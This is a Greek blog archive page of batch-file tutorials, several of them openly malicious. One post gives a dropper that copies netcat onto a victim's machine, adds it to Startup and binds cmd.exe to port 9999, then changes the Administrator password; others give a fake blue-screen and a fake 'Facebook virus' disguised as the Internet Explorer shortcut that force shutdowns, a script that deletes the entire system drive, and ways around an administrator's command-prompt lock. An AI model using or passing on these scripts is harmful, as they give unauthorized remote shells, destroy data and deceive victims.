Αρχείο για bat

Δημιουργία ψεύτικης Blue Screen of Death

Posted in Χρήσιμα with tags , , on Μαρτίου 15, 2010 by netbiosX

Αν θέλετε να τρομάξετε κάποιον φίλο σας ή εχθρό σας στο διαδίκτυο τότε μπορείτε να δημιουργήσετε μία ψεύτικη Blue Screen of Death (η οθόνη που εμφανίζεται όταν κρασάρουν τα Windows).

Ανοίγουμε ένα αρχείο σημειωματαρείου,κάνουμε επικόλληση τον παρακάτω κώδικα και το σώζουμε σαν BSOD.bat.

Όταν θα το τρέξει στον υπολογιστή του θα του εμφανίσει μέσω της γραμμής εντολών,την λεγόμενη μπλε οθόνη με διάφορα ψεύτικα μηνύματα όπως θα δούμε και από τα echo στο .bat αρχείο και θα του κάνει ένα απλό shutdown στον υπολογιστή του στο τέλος.

@echo off
cd /
cls
color 17
echo A problem has been detected and Windows has been shut down to prevent damage
echo to your computer.
echo.
echo The problem seems to be caused by the following file: SPCMDCON.SYS
echo.
echo PAGE_FAULT_IN_NONPAGED_AREA
echo.
echo If this is the first time you've seen this stop error screen,
echo restart your computer. If this screen appears again, follow
echo these steps:
echo.
echo Check to make sure any new hardware or software is properly installed.
echo If this is a new installation, ask your hardware or software manufacturer
echo for any Windows updates you might need.
echo.
echo If problems continue, disable or remove any newly installed hardware
echo or software. Disable BIOS memory options such as caching or shadowing.
echo If you need to use Safe Mode to remove or disable components, restart
echo your computer, press F8 to select Advanced Startup Options, and then
echo select Safe Mode.
echo.
echo Technical information:
echo.
echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)
echo.
echo.
echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c
pause >nul
cls
echo Downloading viruses . . .
ping localhost -n 5 >nul
dir /s
pause >nul
shutdown -s -t 120 -c "Your computer has crashed Contact Microsoft for help."

Εικόνα:

Advertisements

Χάκινγκ σε υπολογιστή δικτύου

Posted in Χάκινγκ with tags , , , , on Μαρτίου 5, 2010 by netbiosX

Όπως όλοι γνωρίζουμε ένα trojan είναι πολύ πιθανόν να ανακαλυφθεί από τα antivirus οπότε αυτό που θα χρειαστούμε στην συγκεκριμένη περίπτωση είναι το netcat.Το netcat είναι ένα πρόγραμμα το οποίο ανοίγει μία θύρα (port) σε κάποιον υπολογιστή για να μας δώσει πρόσβαση.

Θα πρέπει λοιπόν να γράψουμε ένα batch αρχείο το οποίο θα αντιγράφει το netcat στον απομακρυσμένο υπολογιστή.Για να γίνει αυτό θα πρέπει το batch αρχείο να εκτελεστεί με κάποιον τρόπο από τον υπολογιστή που θέλουμε να χακάρουμε.

Ανοίγουμε το σημειωματάρειο και πληκτρολογούμε το ακόλουθο:

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe
cd «Documents and Settings»
cd «All Users»
cd «Start Menu»
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (Αυτό είναι ένα άλλο batch αρχείο που θα γράψουμε παρακάτω)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat

Το επόμενο batch αρχείο θα χρησιμοποιηθεί για να σιγουρευτούμε ότι το port που καθορίσαμε θα ανοίγει κάθε φορά που θα κάνουν εκκίνηση τα windows.Μπορούμε φυσικά να βάλουμε όποιο port επιθυμούμε.Ανοίγουμε λοιπόν το σημειωματάρειο πάλι και γράφουμε το εξής:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Σώζουμε το αρχείο σαν .bat.Αυτό θα είναι το αρχείο που θα αντιγραφεί στον φάκελο startup από το προηγούμενο bat που είχαμε γράψει.

Μπορούμε φυσικά να κρύψουμε αυτό το αρχείο σε ένα άλλο αρχείο και να το διαμοιράσουμε μέσα στο δίκτυο.Όταν κάποιος τρέξει το αρχείο το netcat θα αντιγραφεί στον υπολογιστή του και θα ανοίξει μία θύρα στην προκειμένη περίπτωση είναι η 9999.Μόλις η θύρα ανοίξει μπορούμε να χρησιμοποιήσουμε το telnet σε αυτήν την θύρα του απομακρυσμένου υπολογιστή και να αποκτήσουμε πλήρης πρόσβαση.

Τώρα που έχουμε πλήρης πρόσβαση το επόμενα βήμα είναι να αλλάξουμε το administrator password με την εντολή:

net user Administrator newpassword

Πλέον μπορούμε να κάνουμε ότι θέλουμε στον υπολογιστή όπως για παράδειγμα να τερματίσουμε την λειτουργία του κτλ.Μπορούμε να το κάνουμε αυτό απλώς αν μπούμε στον φάκελο System32 και πληκτρολογήσουμε το παρακάτω:

shutdown -r -t 10 -c «Hello»

Ο απομακρυσμένος υπολογιστής θα κάνει επανεκκίνηση μέσα σε 10 δευτερόλεπτα.Μπορούμε αν θέλουμε να το προχωρήσουμε ακόμα πιο μακριά απλά και μόνο αν εγκαταστήσουμε το Cain & Abel στον υπολογιστή μας και μετά εγκαταστήσουμε το Abel στον απομακρυσμένο υπολογιστή εφόσον πλέον ξέρουμε και το administrator password.Μόλις εγκατασταθεί το Abel στον απομακρυσμένο υπολογιστή μπορούμε να κάνουμε εκκίνηση και τερματισμό υπηρεσίων και πολλά περισσότερα… 

Κατεβάστε το netcat από εδώ.

Δημιουργία ψεύτικου facebook virus

Posted in Προγραμματισμός with tags , , , on Φεβρουαρίου 24, 2010 by netbiosX

Αν θέλουμε να δημιουργήσουμε έναν ψεύτικο ιό και έχουμε και φυσική πρόσβαση στον υπολογιστή που θέλουμε να τον περάσουμε τότε αρκεί να ακολουθήσουμε τα παρακάτω. 

Μέθοδος

1)Ανοίγουμε ένα νέο έγγραφο κειμένου

2)Πληκτρολογούμε το ακόλουθο

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c » SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ………..»

3)Το σώζουμε με την ονομασία Internet Explorer.bat

4)Κάνουμε δεξί κλικ στο Internet Explorer.bat και δημιουργούμε μία συντόμευση

5)Κάνουμε δεξί κλικ στην συντόμευση και επιλέγουμε ιδιότητες

6)Στην καρτέλα συντόμευση επιλέγουμε αλλαγή εικονιδίου

Εικόνα 1:

Αλλαγή εικονιδίου

7)Επιλέγουμε το εικονίδιο του Internet Explorer,πατάμε OK και μετά εφαρμογή

8)Διαγράφουμε την πραγματική συντόμευση του Internet Explorer και την αντικαθιστούμε με την ψεύτικη

Όταν το θύμα μας κάνει κλικ στην ψεύτικη συντόμευση του Internet Explorer θα εμφανιστούν τα ακόλουθα μηνύματα:

Εικόνα 2:

Εικόνα 3:

Εικόνα 4:

Μετά από 5 λεπτά τα windows θα κάνουν επανεκκίνηση και αυτό είναι όλο.Μπορούμε φυσικά να κρατήσουμε το αρχείο .bat σε ένα usb και να το πέρασουμε σε όσους υπολογιστές έχουμε φυσική πρόσβαση (σχολείο,δουλειά,πανεπιστήμιο κτλ) ούτως ώστε να δουλέψουμε ακόμα περισσότερο κόσμο.

Καλή διασκέδαση 🙂

Υποσημείωση:

Για να κατεβάσετε το script κάντε κλικ εδώ

Κάνοντας την γραμμή εντολών να μιλήσει

Posted in Χρήσιμα with tags , , on Φεβρουαρίου 18, 2010 by netbiosX

Σε περίπτωση που θέλουμε να κάνουμε την γραμμή εντολών να μιλήσει με το μήνυμα που θέλουμε προκειμένου να εντυπωσιάσουμε τους φίλους μας αρκεί να κάνουμε τα παρακάτω.

Δημιουργούμε ένα έγγραφο κειμένου και αντιγράφουμε τον παρακάτω κώδικα μέσα σε αυτό:

Κώδικας:

:speaker
IF EXIST «Voice» goto Menu
IF NOT EXIST «Voice» goto voicemake
REM this makes a folder named voice if not alredy exist
:voicemake
md Voice
goto vbss
REM this makes the VBS files in the voice folder
:vbss
echo.Set Speech = CreateObject(«SAPI.SpVoice»)>> «%CD%\Voice\Welcome.vbs»
echo.Speech.Speak «Το μήνυμα σας εδώ«>> «%CD%\Voice\Welcome.vbs»
REM The menu with voice saying what u wrote
:menu
start %CD%\Voice\Welcome.vbs
pause

Το σώζουμε σαν αρχείο .bat και μετά το τρέχουμε.Θα δούμε ότι θα μας ανοίξει την γραμμή εντολών και ο υπολογιστής θα πει το μήνυμα που θέλουμε.

Εικόνα:

 

Ομιλία μέσω της γραμμής εντολών

Αυτό το script δεν κάνει τίποτα άλλο από το να χρησιμοποιεί την φωνή του υπολογιστή μας (SAM Voice) και να διαβάζει το κείμενο που του έχουμε εισάγει.Γι’αυτό είναι προτιμότερο το κείμενο μας να είναι στα αγγλικά.

Download script:

http://uploading.com/files/f56dbfmb/Speak.txt/

Format στον δίσκο μέσω του notepad

Posted in Χρήσιμα with tags , on Οκτώβριος 2, 2009 by netbiosX

Σε περίπτωση που έχουμε κάνει backup τα αρχεία μας και θέλουμε να κάνουμε ένα γρήγορο φορμάτ στον δίσκο μας τότε μπορούμε να γράψουμε τον ακόλουθο κώδικα σε ένα αρχείο σημειωματαρείου και να το τρέξουμε σαν .bat αρχείο.

Κώδικας:

@Echo off
Del C:\ *.*y

το σώζουμε σαν Dell.bat

ή ακόμα χειρότερα:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

και το σώζουμε σαν .bat με ότι ονομασία θέλουμε.

Πώς να ανοίξουμε την γραμμή εντολών όταν είναι κλειδωμένη

Posted in Χρήσιμα with tags , , , on Αύγουστος 10, 2009 by netbiosX

Πολλοί διαχείριστες δικτύων έχουν την τάση να απενεργοποιούν αρκετές λειτουργίες στα μηχανήματα των χρηστών τους.Μία από αυτές τις λειτουργίες είναι και η γραμμή εντολών.Αν θέλουμε λοιπόν να αποκτήσουμε πρόσβαση στην γραμμή εντολών για τον οποιοδήποτε λόγο μπορούμε να δοκιμάσουμε κάποιο απο τα παρακάτω:

  1. Έναρξη—->Εκτέλεση—->CMD
  2. Άνοιγμα του Word και πληκτρολογούμε το ακόλουθο file:///C:/windows/system32/cmd.exe και κάνουμε κλικ στο link
  3. Ανοίγουμε ένα αρχείο notepad και πληκτρολογούμε command.com και το σώζουμε σαν αρχείο .bat
  4. Ανοίγουμε ένα αρχείο notepad και πληκτρολογούμε start και το σώζουμε σαν αρχείο .bat
  5. Δημιουργούμε μία συντόμευση και στην θέση του στοιχείου γράφουμε command.com

Δεν μπορούμε να γνωρίζουμε αν οι παραπάνω μέθοδοι θα έχουν 100% επιτυχία καθώς αυτό εξαρτάται από το τι έχει κάνει ο εκάστοστε διαχειριστής με την registry για να κλειδώσει την γραμμή εντολών αλλά αν δεν έχει ασχοληθεί αρκετά θα καταφέρουμε με κάποιον τρόπο από τους παραπάνω να εκτελέσουμε τις εντολές που θέλουμε.